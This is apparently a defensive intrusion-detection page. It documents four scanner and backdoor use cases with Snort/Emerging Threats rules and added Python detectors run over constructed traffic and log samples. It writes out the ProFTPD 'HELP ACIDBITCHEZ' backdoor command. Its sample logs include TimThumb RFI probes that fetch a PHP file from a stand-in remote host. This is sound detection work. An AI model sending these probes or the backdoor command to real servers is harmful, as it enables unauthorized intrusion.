SUC029 : WordPress TimThumb RFI Web Scanner/Robot

  • Use Case Reference : SUC029
  • Use Case Title : WordPress TimThumb RFI Web Scanner/Robot
  • Use Case Detection : IDS / HTTP logs
  • Attacker Class : Opportunists
  • Attack Sophistication : Unsophisticated
  • Identified tool(s) : ByroeNet scanner variant
  • Source IP(s) : Random
  • Source Countries : Random
  • Source Port(s) : Random
  • Destination Port(s) : 80/TCP, 443/TCP

Possible(s) correlation(s) :

Source(s) :

ZATAZ SIG 1010050 triggers are :

  • The URI should contain both “wp-content” and “php?src=http”, matched case-insensitively (nocase).
  • Source: any port from $EXTERNAL_NET; destination: $HTTP_SERVERS on $HTTP_PORTS, on an established flow towards the server.
  • Threshold is “type limit, count 1, seconds 30, track by_src”: the first match from a source IP raises an alert and further matches from that same IP within the next 30 seconds are suppressed, so a scanner probing many theme and plugin paths produces one event per 30-second window rather than one per request.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ZATAZ Timthumb.php - ACCESS - possible WordPress-Attack"; flow:established,to_server; uricontent:"wp-content"; nocase; uricontent:"php?src=http"; nocase; threshold:type limit, count 1, seconds 30, track by_src; classtype:web-application-attack; sid:1010050; priority:3; rev:1;)
[Figure: SIG 1010050 1 week events activity]
[Figure: SIG 1010050 1 month events activity]
[Figure: SIG 1010050 1 year events activity]
[Figure: 1 month TOP 10 source IPs for SIG 1010050]

SUC028 : ProFTPD Backdoor Inbound Backdoor Open Request (ACIDBITCHEZ)

  • Use Case Reference : SUC028
  • Use Case Title : ProFTPD Backdoor Inbound Backdoor Open Request (ACIDBITCHEZ)
  • Use Case Detection : IDS / FTP logs
  • Attacker Class : Opportunists
  • Attack Sophistication : Unsophisticated
  • Identified tool(s) : Metasploit, Nessus, scripts, etc.
  • Source IP(s) : Random
  • Source Countries : Random
  • Source Port(s) : Random
  • Destination Port(s) : 21/TCP

Possible(s) correlation(s) :

  • Pen-testing tools or home-made scripts

Source(s) :

  • ProFTPD Backdoor demo

Emerging Threats SIG 2011994 triggers are :

  • The FTP control-channel content should contain “HELP ACIDBITCHEZ”, which is the command that opens the backdoor.
  • Source: any port from $EXTERNAL_NET; destination: $HOME_NET port 21/TCP.
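The following is an added example, not code from the original page nor from Emerging Threats, that reproduces the scope and content check of SIG 2011994 over a constructed FTP control-channel capture. It assumes a $HOME_NET of 192.0.2.0/24 (with $EXTERNAL_NET taken as everything else), matches the “HELP ACIDBITCHEZ” string exactly as quoted above, and approximates the rule's flow:established,to_server with a direction check. It also reassembles each flow into CRLF-terminated commands, which is what an IDS stream preprocessor does for you: a trigger split across two TCP segments is still seen as one command, whereas a per-packet grep would miss it.

```python
import ipaddress
from typing import Dict, List, Tuple

# Assumed $HOME_NET (RFC 5737 test range); $EXTERNAL_NET is taken as !$HOME_NET.
HOME_NET = [ipaddress.ip_network("192.0.2.0/24")]
FTP_PORT = 21
TRIGGER = b"HELP ACIDBITCHEZ"   # matched exactly as quoted on the page


def in_home_net(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in HOME_NET)


# Constructed control-channel segments (not a real capture): one dict per TCP
# payload, in capture order. They cover a benign HELP, the real trigger, the same
# string sent outbound by an internal scanner (out of the rule's scope), the string
# on a non-FTP port, and the trigger split across two segments.
SAMPLE_SEGMENTS: List[Dict] = [
    {"src": "203.0.113.5", "dst": "192.0.2.10", "dport": 21, "data": b"HELP\r\n"},
    {"src": "192.0.2.10", "dst": "203.0.113.5", "dport": 40001, "data": b"214 Direct comments to ftp-admin\r\n"},
    {"src": "203.0.113.5", "dst": "192.0.2.10", "dport": 21, "data": b"HELP ACIDBITCHEZ\r\n"},
    {"src": "192.0.2.77", "dst": "198.51.100.3", "dport": 21, "data": b"HELP ACIDBITCHEZ\r\n"},
    {"src": "203.0.113.5", "dst": "192.0.2.10", "dport": 2121, "data": b"HELP ACIDBITCHEZ\r\n"},
    {"src": "203.0.113.9", "dst": "192.0.2.10", "dport": 21, "data": b"HELP ACID"},
    {"src": "203.0.113.9", "dst": "192.0.2.10", "dport": 21, "data": b"BITCHEZ\r\n"},
]


def detect(segments: List[Dict]) -> List[Dict]:
    """Mirror ET SIG 2011994: "HELP ACIDBITCHEZ" in client->server data of an
    $EXTERNAL_NET -> $HOME_NET:21 flow, checked on the reassembled command line."""
    buffers: Dict[Tuple[str, str, int], bytes] = {}
    alerts: List[Dict] = []
    for seg in segments:
        # Scope first: only traffic towards port 21 on a HOME_NET host from outside.
        if seg["dport"] != FTP_PORT:
            continue
        if in_home_net(seg["src"]) or not in_home_net(seg["dst"]):
            continue
        # Reassemble per flow and only inspect complete CRLF-terminated commands,
        # so a trigger split across segments is still seen as one command.
        key = (seg["src"], seg["dst"], seg["dport"])
        *complete, remainder = (buffers.get(key, b"") + seg["data"]).split(b"\r\n")
        buffers[key] = remainder
        for command in complete:
            if TRIGGER in command:
                alerts.append({"sid": 2011994, "src": seg["src"], "dst": seg["dst"],
                               "command": command.decode("ascii", "replace")})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_SEGMENTS):
        print(f'sid={a["sid"]} {a["src"]} -> {a["dst"]}:21 command={a["command"]!r}')
```

On the constructed capture this yields two alerts, one per external source: the plain “HELP” and the outbound and non-port-21 copies of the trigger stay silent, and the split trigger from 203.0.113.9 is caught only because the flow was reassembled before matching. When hunting in FTP server logs rather than packets, the same token is what to search for; note that “HELP” on its own is a legitimate command and is not a useful indicator.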
[Figure: SIG 2011994 1 year events activity]

SUC027 : Muieblackcat setup.php Web Scanner/Robot

  • Use Case Reference : SUC027
  • Use Case Title : Muieblackcat setup.php Web Scanner/Robot
  • Use Case Detection : IDS / HTTP logs
  • Attacker Class : Opportunists
  • Attack Sophistication : Unsophisticated
  • Identified tool(s) : N.D.
  • Source IP(s) : Random
  • Source Countries : Random
  • Source Port(s) : Random
  • Destination Port(s) : 80/TCP, 443/TCP

Possible(s) correlation(s) :

  • According to the logs, this scanner is looking for “setup.php” files.

Source(s) :

Emerging Threats SIG 2013115 triggers are :

  • The HTTP request line should contain “GET /muieblackcat HTTP/1.1”. A complete set of logs is available here.
  • Source: any port from $EXTERNAL_NET; destination: $HOME_NET on $HTTP_PORTS.
[Figure: SIG 2013115 1 week events activity]
[Figure: SIG 2013115 1 month events activity]
[Figure: 1 month TOP 10 source IPs for SIG 2013115]
[Figure: TOP 20 source countries for SIG 2013115]

SUC026 : DataCha0s Web Scanner/Robot

  • Use Case Reference : SUC026
  • Use Case Title : DataCha0s Web Scanner/Robot
  • Use Case Detection : IDS / HTTP logs
  • Attacker Class : Opportunists
  • Attack Sophistication : Unsophisticated
  • Source IP(s) : Random
  • Source Countries : Mostly US and Brazil
  • Source Port(s) : Random
  • Destination Port(s) : 80/TCP, 443/TCP

Possible(s) correlation(s) :

  • DataCha0s bot.

Source(s) :

Emerging Threats SIG 2003616 triggers are :

  • The HTTP headers should contain the “DataCha0s” User-Agent string. Example: User-Agent: DataCha0s/2.0
  • Source: any port from $EXTERNAL_NET; destination: $HOME_NET on $HTTP_PORTS.
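The three HTTP use cases on this page (SUC029 / ZATAZ SIG 1010050, SUC027 / ET SIG 2013115 and SUC026 / ET SIG 2003616) all reduce to a content match on the request, and the TimThumb rule adds a per-source threshold. The example below is added here and is not code from the original page, from ZATAZ or from Emerging Threats; it re-implements the three triggers over a few constructed Apache “combined” format access-log lines so the signatures can be checked against web-server logs when no IDS was in front of the host. Assumptions: the log format, the RFC 5737 addresses in the sample, case-sensitive matching of “DataCha0s” as quoted above, and the message strings for the two ET rules, which are taken from the use-case titles rather than from the real rules. The Snort “threshold:type limit, count 1, seconds 30, track by_src” semantics of SIG 1010050 are reproduced per (sid, source IP).

```python
import re
from datetime import datetime
from typing import Callable, Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlparse

# Constructed combined-format access-log lines (not real traffic; RFC 5737 test
# addresses). Lines 1-3 repeat the TimThumb probe from one source to exercise
# the 30-second threshold; line 5 is the setup.php probe that has no signature
# of its own; line 7 has "wp-content" without the RFI payload and must not fire.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Aug/2011:14:02:11 +0200] "GET /wp-content/themes/foo/timthumb.php?src=http://198.51.100.9/x.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Aug/2011:14:02:12 +0200] "GET /wp-content/themes/bar/thumb.php?src=http://198.51.100.9/x.php HTTP/1.1" 404 210 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Aug/2011:14:02:50 +0200] "GET /wp-content/plugins/baz/timthumb.php?src=HTTP://198.51.100.9/x.php HTTP/1.1" 404 210 "-" "Mozilla/5.0"
198.51.100.42 - - [10/Aug/2011:14:03:01 +0200] "GET /muieblackcat HTTP/1.1" 404 210 "-" "-"
198.51.100.42 - - [10/Aug/2011:14:03:02 +0200] "GET /setup.php HTTP/1.1" 404 210 "-" "-"
192.0.2.33 - - [10/Aug/2011:14:04:00 +0200] "GET / HTTP/1.1" 200 1024 "-" "DataCha0s/2.0"
192.0.2.34 - - [10/Aug/2011:14:04:05 +0200] "GET /wp-content/uploads/a.jpg HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""

# Apache/nginx "combined" format: src ident user [time] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line: str) -> Optional[dict]:
    """Parse one combined-format line into a dict; None if the line does not fit."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def match_timthumb(rec: dict) -> Optional[str]:
    """SIG 1010050: both uricontent patterns, nocase; returns the remote src= URL for triage."""
    low = rec["uri"].lower()
    if "wp-content" in low and "php?src=http" in low:
        return "src=" + parse_qs(urlparse(rec["uri"]).query).get("src", ["?"])[0]
    return None


def match_muieblackcat(rec: dict) -> Optional[str]:
    """SIG 2013115: the literal request line "GET /muieblackcat HTTP/1.1"."""
    request_line = f'{rec["method"]} {rec["uri"]} {rec["proto"]}'
    return request_line if request_line == "GET /muieblackcat HTTP/1.1" else None


def match_datacha0s(rec: dict) -> Optional[str]:
    """SIG 2003616: "DataCha0s" in the User-Agent header (case-sensitive, as quoted on the page)."""
    return rec["ua"] if "DataCha0s" in rec["ua"] else None


# (sid, message, matcher, window for "threshold:type limit, count 1, seconds N, track by_src")
# Messages for the two ET rules are the use-case titles, not the rules' real msg strings.
RULES: List[Tuple[int, str, Callable[[dict], Optional[str]], Optional[int]]] = [
    (1010050, "ZATAZ Timthumb.php - ACCESS - possible WordPress-Attack", match_timthumb, 30),
    (2013115, "Muieblackcat setup.php Web Scanner/Robot", match_muieblackcat, None),
    (2003616, "DataCha0s Web Scanner/Robot", match_datacha0s, None),
]


def scan(log_text: str) -> List[dict]:
    """Run every rule over the log, applying the per-(sid, source IP) limit threshold."""
    window_start: Dict[Tuple[int, str], datetime] = {}
    alerts: List[dict] = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for sid, msg, matcher, limit in RULES:
            detail = matcher(rec)
            if detail is None:
                continue
            if limit is not None:
                key = (sid, rec["src"])
                start = window_start.get(key)
                # type limit, count 1: the first match opens a window and alerts;
                # later matches from the same source inside the window are dropped.
                if start is not None and (rec["ts"] - start).total_seconds() < limit:
                    continue
                window_start[key] = rec["ts"]
            alerts.append({"sid": sid, "msg": msg, "src": rec["src"],
                           "ts": rec["ts"].isoformat(), "detail": detail})
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f'{a["ts"]} sid={a["sid"]} src={a["src"]} {a["msg"]} [{a["detail"]}]')
```

Run against the sample, the three TimThumb probes from 203.0.113.7 produce two events, not three: the second request arrives one second after the first and is dropped by the 30-second limit, the third arrives 39 seconds later and opens a new window. This is why the event counts in the activity graphs above understate the number of requests a TimThumb scanner actually sends. The extracted src= URL is the remote file the scanner wants TimThumb to fetch and is the first thing to pull for triage; the setup.php request fires nothing because no signature on this page covers it, which is the point of the correlation note under SUC027.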
[Figure: SIG 2003616 1 week events activity]
[Figure: SIG 2003616 1 month events activity]
[Figure: 1 month TOP 10 source IPs for SIG 2003616]
[Figure: TOP 20 source countries for SIG 2003616]